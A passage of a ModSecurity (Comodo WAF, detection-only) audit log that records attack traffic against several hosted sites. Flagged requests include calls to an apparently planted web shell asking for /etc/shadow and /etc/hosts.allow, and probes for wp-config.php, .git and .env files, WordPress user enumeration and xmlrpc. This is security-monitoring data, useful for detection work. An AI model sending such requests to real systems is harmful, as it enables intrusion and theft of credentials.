userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||198.71.51.75|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aE3yj_CFSLfJixou_W0orQAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|198.71.51.75|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "198.71.51.75"] [uri "/wsman"] [unique_id "aE3yj_CFSLfJixou_W0orQAAAAY"] Stopwatch: 1749938831043606 2710 (- - -) Stopwatch2: 1749938831043606 2710; combined=1664, p1=371, p2=1173, p3=14, p4=15, p5=91, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6dc46359-Z-- --b31f7865-A-- [15/Jun/2025:03:56:51.642522 +0530] aE33K54hb3-ZG-auIyDTtgAAAAg 54.159.98.248 44628 127.0.0.1 7081 --b31f7865-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/shadow HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.159.98.248 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --b31f7865-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2929 Connection: close Content-Type: text/html; charset=UTF-8 --b31f7865-H-- Message: Warning. Matched phrase "etc/shadow" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/shadow found within ARGS:viewfile: /etc/shadow"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/shadow" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/shadow found within ARGS:viewfile: /etc/shadow"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE33K54hb3-ZG-auIyDTtgAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749940011638590 3983 (- - -) Stopwatch2: 1749940011638590 3983; combined=2017, p1=361, p2=1547, p3=32, p4=24, p5=53, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b31f7865-Z-- --4012e11d-A-- [15/Jun/2025:04:09:01.038860 +0530] aE36BRkoa9Lad8nP7KN4_gAAABA 52.169.53.14 48468 127.0.0.1 7080 --4012e11d-B-- GET /hitech-news.com HTTP/1.0 Host: deck-story.com X-Real-IP: 52.169.53.14 Connection: close --4012e11d-F-- HTTP/1.1 404 Not Found Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1 --4012e11d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||deck-story.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||deck-story.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "deck-story.com"] [uri "/hitech-news.com"] [unique_id "aE36BRkoa9Lad8nP7KN4_gAAABA"] Stopwatch: 1749940741035699 3212 (- - -) Stopwatch2: 1749940741035699 3212; combined=1945, p1=464, p2=1340, p3=20, p4=26, p5=94, sr=239, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4012e11d-Z-- --d64bfa10-A-- [15/Jun/2025:04:10:25.471346 +0530] aE36WfBViRrxRfhQ2snXxAAAAAE 52.169.53.14 40540 127.0.0.1 7080 --d64bfa10-B-- GET /wp-includes/css/wp-config.php HTTP/1.0 Host: deck-story.com X-Real-IP: 52.169.53.14 Connection: close --d64bfa10-F-- HTTP/1.1 404 Not Found Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1 --d64bfa10-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "deck-story.com"] [uri "/wp-includes/css/wp-config.php"] [unique_id "aE36WfBViRrxRfhQ2snXxAAAAAE"] Stopwatch: 1749940825467892 3493 (- - -) Stopwatch2: 1749940825467892 3493; combined=2081, p1=497, p2=1476, p3=34, p4=28, p5=46, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d64bfa10-Z-- --ba758d58-A-- [15/Jun/2025:04:11:09.886183 +0530] aE36hbhvrRrlmSOg3-9zwQAAAAw 52.169.53.14 51508 127.0.0.1 7080 --ba758d58-B-- GET /wp-config.php HTTP/1.0 Host: deck-story.com X-Real-IP: 52.169.53.14 Connection: close --ba758d58-F-- HTTP/1.1 404 Not Found Content-Length: 260 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba758d58-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "deck-story.com"] [uri "/wp-config.php"] [unique_id "aE36hbhvrRrlmSOg3-9zwQAAAAw"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/default/htdocs/wp-config.php' not found or unable to stat Apache-Handler: application/x-httpd-php Stopwatch: 1749940869883412 2821 (- - -) Stopwatch2: 1749940869883412 2821; combined=1667, p1=339, p2=1231, p3=24, p4=22, p5=50, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ba758d58-Z-- --9e1caf2e-A-- [15/Jun/2025:04:16:00.423730 +0530] aE37pyQOy0yoNZQ7dslVBQAAAAk 34.138.0.53 42748 127.0.0.1 7081 --9e1caf2e-B-- GET /.git/config HTTP/1.0 Host: www.tryons.ai X-Real-IP: 34.138.0.53 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip --9e1caf2e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --9e1caf2e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.git/config"] [unique_id "aE37pyQOy0yoNZQ7dslVBQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749941159773738 650055 (- - -) Stopwatch2: 1749941159773738 650055; combined=1626, p1=402, p2=1143, p3=0, p4=0, p5=81, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9e1caf2e-Z-- --5956137b-A-- [15/Jun/2025:04:20:12.042876 +0530] aE38pBkoa9Lad8nP7KN6LwAAABA 18.210.58.238 32816 127.0.0.1 7081 --5956137b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/sensors3.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.210.58.238 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --5956137b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4892 Connection: close Content-Type: text/html; charset=UTF-8 --5956137b-H-- Message: Warning. Matched phrase "etc/sensors3.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sensors3.conf found within ARGS:viewfile: /etc/sensors3.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sensors3.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sensors3.conf found within ARGS:viewfile: /etc/sensors3.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE38pBkoa9Lad8nP7KN6LwAAABA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749941412037150 5798 (- - -) Stopwatch2: 1749941412037150 5798; combined=2853, p1=428, p2=2243, p3=46, p4=51, p5=85, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5956137b-Z-- --5d9b2b5e-A-- [15/Jun/2025:04:22:42.908256 +0530] aE39OuXds7bzDL-AINRgywAAAAM 178.128.124.218 53116 127.0.0.1 7081 --5d9b2b5e-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 178.128.124.218 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --5d9b2b5e-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --5d9b2b5e-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.3econcepts.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE39OuXds7bzDL-AINRgywAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749941562131798 776553 (- - -) Stopwatch2: 1749941562131798 776553; combined=1719, p1=358, p2=1218, p3=0, p4=0, p5=142, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5d9b2b5e-Z-- --83597c14-A-- [15/Jun/2025:04:22:50.357482 +0530] aE39QQv35V08HJVJ6kYTcQAAAAA 178.128.124.218 36808 127.0.0.1 7081 --83597c14-B-- POST //xmlrpc.php HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 178.128.124.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --83597c14-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --83597c14-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.128.124.218 (+1 hits since last alert)|www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.128.124.218 (+1 hits since last alert)|www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.3econcepts.com"] [uri "/xmlrpc.php"] [unique_id "aE39QQv35V08HJVJ6kYTcQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749941569541297 816243 (- - -) Stopwatch2: 1749941569541297 816243; combined=2370, p1=351, p2=1579, p3=49, p4=58, p5=201, sr=97, sw=132, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83597c14-Z-- --0fe13679-A-- [15/Jun/2025:04:37:48.084402 +0530] aE4Awp4hb3-ZG-auIyDXUwAAAAg 51.155.6.11 36008 127.0.0.1 7081 --0fe13679-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 51.155.6.11 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 380 origin: https://www.retaxis.com user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.9906.1306 Mobile Safari/537.36 accept: */* accept-language: en-US,en;q=0.5 content-type: text/plain;charset=UTF-8 sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br cookie: _sfs_id=769eea07cba0ec8cbfdd800a7e9636301749942458; _fbp=fb.1.1749942466593.959166661615288217 --0fe13679-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=kttn3il7s630gd1ib3ltk5vlpb; expires=Fri, 12 Sep 2025 23:07:47 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --0fe13679-E-- --0fe13679-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE4Awp4hb3-ZG-auIyDXUwAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE4Awp4hb3-ZG-auIyDXUwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942466863028 1221492 (- - -) Stopwatch2: 1749942466863028 1221492; combined=2731, p1=460, p2=2015, p3=110, p4=32, p5=113, sr=117, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0fe13679-Z-- --1f304e08-A-- [15/Jun/2025:04:39:35.744400 +0530] aE4BL7hvrRrlmSOg3-917wAAAAw 34.194.233.48 60462 127.0.0.1 7081 --1f304e08-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/hosts.allow HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.194.233.48 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --1f304e08-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3168 Connection: close Content-Type: text/html; charset=UTF-8 --1f304e08-H-- Message: Warning. Matched phrase "etc/hosts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hosts found within ARGS:viewfile: /etc/hosts.allow"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/hosts" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/hosts found within ARGS:viewfile: /etc/hosts.allow"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE4BL7hvrRrlmSOg3-917wAAAAw"] Apache-Handler: application/x-httpd-php Stopwatch: 1749942575739499 4973 (- - -) Stopwatch2: 1749942575739499 4973; combined=2796, p1=385, p2=2295, p3=39, p4=26, p5=50, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1f304e08-Z-- --fc9e6370-A-- [15/Jun/2025:04:40:48.842635 +0530] aE4BeHAK-xWqAl1k3Dz9WgAAAAY 185.177.72.3 55830 127.0.0.1 7081 --fc9e6370-B-- GET /backup/.env HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --fc9e6370-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --fc9e6370-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/backup/.env"] [unique_id "aE4BeHAK-xWqAl1k3Dz9WgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648283439 559282 (- - -) Stopwatch2: 1749942648283439 559282; combined=1944, p1=384, p2=1445, p3=0, p4=0, p5=114, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc9e6370-Z-- --53dd9e22-A-- [15/Jun/2025:04:40:48.847854 +0530] aE4BeJ4hb3-ZG-auIyDXnwAAAAg 185.177.72.3 55836 127.0.0.1 7081 --53dd9e22-B-- GET /.git/info/exclude HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --53dd9e22-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --53dd9e22-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.git/info/exclude"] [unique_id "aE4BeJ4hb3-ZG-auIyDXnwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648298972 548952 (- - -) Stopwatch2: 1749942648298972 548952; combined=2155, p1=419, p2=1646, p3=0, p4=0, p5=89, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53dd9e22-Z-- --83e99c60-A-- [15/Jun/2025:04:40:48.899537 +0530] aE4BeNC7wXmuvKRT4ToorgAAAA8 185.177.72.3 55820 127.0.0.1 7081 --83e99c60-B-- GET /.git/refs/heads/master HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 aiohttp/3.12.13 --83e99c60-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.bspsons.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --83e99c60-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.bspsons.com"] [uri "/.git/refs/heads/master"] [unique_id "aE4BeNC7wXmuvKRT4ToorgAAAA8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/bspsons.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942648283069 616541 (- - -) Stopwatch2: 1749942648283069 616541; combined=1663, p1=366, p2=1211, p3=0, p4=0, p5=85, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83e99c60-Z-- --bb58a144-A-- [15/Jun/2025:04:40:48.944934 +0530] aE4BeNlaOcxgn8EdjwO5XQAAAAc 185.177.72.3 55862 127.0.0.1 7081 --bb58a144-B-- GET /.env.production HTTP/1.0 Host: www.bspsons.com X-Real-IP: 185.177.72.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.12 